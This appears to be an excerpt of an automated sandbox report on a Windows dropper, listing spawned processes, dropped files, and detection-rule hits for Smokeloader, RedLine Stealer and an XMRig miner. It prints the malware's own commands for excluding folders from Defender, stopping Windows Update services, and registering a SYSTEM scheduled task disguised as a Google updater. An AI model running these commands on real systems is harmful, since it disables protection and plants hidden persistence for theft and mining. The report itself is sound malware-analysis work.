Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 3_2_004101E8	3_2_004101E8
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 3_2_00410DED	3_2_00410DED
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 3_2_0041067D	3_2_0041067D
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 3_2_00410A1B	3_2_00410A1B
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 3_2_00415624	3_2_00415624
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 3_2_00415B75	3_2_00415B75
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 3_2_004167A2	3_2_004167A2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FFD348948FA	26_2_00007FFD348948FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FFD34899185	26_2_00007FFD34899185
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FFD348952FA	26_2_00007FFD348952FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FFD3489D267	26_2_00007FFD3489D267
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 26_2_00007FFD3489A7C8	26_2_00007FFD3489A7C8
Source: C:\Windows\System32\conhost.exe	Code function: 60_2_00007FF6EB4485E0	60_2_00007FF6EB4485E0
Source: C:\Windows\System32\conhost.exe	Code function: 60_2_00007FF6EB4371B0	60_2_00007FF6EB4371B0
Source: C:\Windows\System32\conhost.exe	Code function: 60_2_00007FF6EB446DA0	60_2_00007FF6EB446DA0
Source: C:\Windows\System32\conhost.exe	Code function: 60_2_00007FF6EB443E00	60_2_00007FF6EB443E00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 64_2_00007FFD3489CA15	64_2_00007FFD3489CA15
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 64_2_00007FFD3489CE85	64_2_00007FFD3489CE85
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 64_2_00007FFD348991FA	64_2_00007FFD348991FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 64_2_00007FFD348949CD	64_2_00007FFD348949CD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 64_2_00007FFD348992FA	64_2_00007FFD348992FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 64_2_00007FFD348952FA	64_2_00007FFD348952FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 64_2_00007FFD3489B7D3	64_2_00007FFD3489B7D3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 64_2_00007FFD3489A7C8	64_2_00007FFD3489A7C8

Source: C:\Windows\explorer.exe

Process Stats: CPU usage > 49%

Source: C:\Windows\explorer.exe	Section loaded: webio.dll
Source: C:\Windows\explorer.exe	Section loaded: mfsrcsnk.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.cloudstore.schema.shell.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.internal.shell.broker.dll

Source: C:\Program Files\Google\Chrome\updater.exe

File created: C:\Program Files\Google\Libs\WR64.sys

Source: updater.exe.6.dr	Static PE information: Number of sections : 11 > 10
Source: latestX.exe.0.dr	Static PE information: Number of sections : 11 > 10
Source: Broom.exe.2.dr	Static PE information: Number of sections : 11 > 10

Source: Joe Sandbox View

Dropped File: C:\Program Files\Google\Chrome\updater.exe F91E4FF7811A5848561463D970C51870C9299A80117A89FB86A698B9F727DE87

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe, type: SAMPLE	Matched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector
Source: 39.2.updater.exe.7ff7fa9d7e20.1.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 39.2.updater.exe.7ff7fa9d7e20.1.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 39.2.updater.exe.7ff7fa9d7e20.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 39.2.updater.exe.7ff7fa990000.0.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 39.2.updater.exe.7ff7fa990000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 39.2.updater.exe.7ff7fa990000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 39.2.updater.exe.7ff7fa9d4540.2.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 39.2.updater.exe.7ff7fa9d4540.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 39.2.updater.exe.7ff7fa9d4540.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 39.2.updater.exe.7ff7fa9d7e20.1.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 39.2.updater.exe.7ff7fa9d7e20.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 39.2.updater.exe.7ff7fa9d7e20.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 0000003B.00000002.2612282713.00000000004C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000011.00000002.4575750686.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000005.00000002.4576083277.0000000002F70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000011.00000002.4575377290.0000000002B16000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000009.00000002.2281261302.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000003.00000002.2155575698.0000000000952000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000027.00000002.2684843852.00007FF7FA9B0000.00000004.00000001.01000000.0000000E.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000039.00000002.2540236474.0000000000A82000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000009.00000002.2281176476.00000000004B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000003B.00000002.2612331641.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000005.00000002.4575660571.0000000002B6B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: C:\Windows\Temp\whxcdqscjswq.tmp, type: DROPPED	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: C:\Windows\Temp\whxcdqscjswq.tmp, type: DROPPED	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: C:\Windows\Temp\whxcdqscjswq.tmp, type: DROPPED	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File deleted: C:\Windows\Temp\__PSScriptPolicyTest_55jy3kl2.nkj.ps1

Source: C:\Users\user\AppData\Local\Temp\InstallSetup5.exe

Code function: 2_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

2_2_00403532

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell

Source: C:\Windows\System32\conhost.exe

Code function: String function: 00007FF6EB433F50 appears 34 times

Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 3_2_00830110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,	3_2_00830110
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 9_2_0040180C Sleep,NtTerminateProcess,	9_2_0040180C
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 9_2_00401818 Sleep,NtTerminateProcess,	9_2_00401818
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 9_2_00401822 Sleep,NtTerminateProcess,	9_2_00401822
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 9_2_00401826 Sleep,NtTerminateProcess,	9_2_00401826
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 9_2_00401834 Sleep,NtTerminateProcess,	9_2_00401834
Source: C:\Users\user\AppData\Roaming\cdttvvc	Code function: 57_2_00A50110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,	57_2_00A50110
Source: C:\Users\user\AppData\Roaming\cdttvvc	Code function: 59_2_0040180C Sleep,NtTerminateProcess,	59_2_0040180C
Source: C:\Users\user\AppData\Roaming\cdttvvc	Code function: 59_2_00401818 Sleep,NtTerminateProcess,	59_2_00401818
Source: C:\Users\user\AppData\Roaming\cdttvvc	Code function: 59_2_00401822 Sleep,NtTerminateProcess,	59_2_00401822
Source: C:\Users\user\AppData\Roaming\cdttvvc	Code function: 59_2_00401826 Sleep,NtTerminateProcess,	59_2_00401826
Source: C:\Users\user\AppData\Roaming\cdttvvc	Code function: 59_2_00401834 Sleep,NtTerminateProcess,	59_2_00401834
Source: C:\Windows\System32\conhost.exe	Code function: 60_2_00007FF6EB433F50 NtClose,	60_2_00007FF6EB433F50

Source: file.exe, 00000000.00000000.2090227189.0000000001282000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamelatestumma.exe4 vs file.exe
Source: file.exe, 00000000.00000002.2139110685.0000000001BDE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs file.exe

Source: toolspub2.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: cdttvvc.19.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

Jump to behavior

Source: classification engine

Classification label: mal100.troj.adwa.spyw.evad.mine.winEXE@101/48@15/3

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Broom.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Broom.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\latestX.exe

File created: C:\Program Files\Google\Chrome\updater.exe

Jump to behavior

Source: file.exe

ReversingLabs: Detection: 73%

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\InstallSetup5.exe "C:\Users\user\AppData\Local\Temp\InstallSetup5.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\toolspub2.exe "C:\Users\user\AppData\Local\Temp\toolspub2.exe"
Source: C:\Users\user\AppData\Local\Temp\InstallSetup5.exe	Process created: C:\Users\user\AppData\Local\Temp\Broom.exe C:\Users\user\AppData\Local\Temp\Broom.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe "C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\latestX.exe "C:\Users\user\AppData\Local\Temp\latestX.exe"
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Process created: C:\Users\user\AppData\Local\Temp\toolspub2.exe "C:\Users\user\AppData\Local\Temp\toolspub2.exe"
Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\servicing\TrustedInstaller.exe C:\Windows\servicing\TrustedInstaller.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe	Process created: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Program Files\Google\Chrome\updater.exe C:\Program Files\Google\Chrome\updater.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
